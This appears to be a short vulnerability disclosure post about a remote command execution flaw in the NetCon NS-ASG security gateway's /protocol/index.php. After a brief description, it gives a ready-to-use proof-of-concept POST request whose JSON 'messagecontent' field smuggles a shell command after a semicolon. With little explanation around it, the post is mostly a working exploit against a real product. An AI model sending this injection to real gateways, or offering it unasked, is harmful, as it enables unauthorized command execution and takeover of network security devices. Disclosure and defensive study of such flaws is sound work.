Netcom Ns Asg Security Gateway Index Php Remote Command Execution Vulnerability
Netcom Ns Asg Security Gateway Index Php Remote Command Execution Vulnerability
#NetCon NS-ASG Security Gateway index.php remote command execution vulnerability
Vulnerability Description
The NS-ASG security gateway index.php file has a remote command execution vulnerability. The attacker can obtain server permissions by constructing a special request package.
Vulnerability Impact
Network NS-ASG Security Gateway
Network surveying and mapping
Vulnerability reappears
Login page
The vulnerable file is /protocol/index.php, and the source code can be obtained by reading the file.
Execute commands by constructing request packages
1
2
3
POST /protocol/index.php
jsoncontent={"protocolType":"getsysdatetime","messagecontent":"1;id>1.txt;"}
This post is licensed under CC BY 4.0 by the author.